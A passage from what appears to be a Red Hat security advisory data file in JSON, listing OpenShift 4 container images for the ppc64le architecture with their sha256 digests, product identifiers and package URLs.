"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3A0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3A65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3Aee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3Af3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3A6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3Abe919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604912"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3Ab9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3A59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602000"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3Afaf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3Aa10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775619097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3A47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3Ad2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564698"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3Ad6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3A8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605534"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3A0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3Ad735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604309"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564516"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3Afc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3A50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3Af5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9@sha256%3Aa7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606167"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3Ab36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577363"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9@sha256%3Ad48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9-operator@sha256%3A93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775601995"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"product": {
